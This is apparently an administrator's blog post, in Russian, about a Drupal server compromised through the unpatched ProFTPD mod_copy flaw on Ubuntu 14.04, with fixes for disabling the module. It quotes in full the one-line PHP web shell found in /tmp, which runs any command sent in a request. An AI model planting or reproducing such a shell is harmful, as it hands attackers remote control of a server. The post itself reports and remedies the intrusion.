Не пофиксенная уязвимость Proftpd в ubuntu.

Недавно столкнулся с ситуацией, когда сайт на drupal взламывали из зо дня в день, на нем появлялось все больше и больше гадости рассылающих спам, и делающих прочие нехорошие вещи. На сервере установлена ubuntu 14.04 полностью обновленная, сайт на drupal(не лучшая cms, но это не мое дело) тоже последней версии. Ничего не предвещало беды, но я вспомнил, что proftpd частенько падал на серваке, загуглив впроблему я выяснил, что в этом виноват скрипт запуска после ротации логов. Если кому интересно нужно открыть /etc/init.d/proftpd, найти и изменить следующую строчку

start-stop-daemon --stop --signal $SIGNAL --quiet --pidfile

на

start-stop-daemon --stop --signal $SIGNAL --retry 1 --quiet --pidfile "$PIDFILE"

и будет все отлично, но сейчас не об этом.


В общем зайдя в каталог /tmp я заметил 2 странных файла, которые вызывали подозрение на взлом.
1. /etc/passwd.copy, файл с данными о пользователях в /tmp, недобрый знак.
2. <?php eval($_REQUEST[cmd]); ?> — ну это было вообще палево.
Отправился в google, и в первой же ссылки выяснил, что вирусню заливали через proftpd.
Статья на хабре [ https://habrahabr.ru/post/257027/ ] на opennet [ https://www.opennet.ru/opennews/art.shtml?num=42015 ]
Недолго думая проверил proftpd на уязвимость, и какое ж было мое удивление, что полностью обновленный сервер, подвержен прошлогодней дыре…
Фикса в пакетах я не нашел, поэтому просто отключил следующий модуль mod_copy.c ведь в нем же уязвимость :-).
Для этого откройте файл /etc/proftpd/modules.conf, найдите строчку LoadModule mod_copy.c и либо ее удалить либо закомментируйте #LoadModule mod_copy.c Не забудьте перезапустить proftpd /etc/init.d/proftpd restart.
Проверить отключен ли данный модуль, можно командой proftpd -vv | grep copy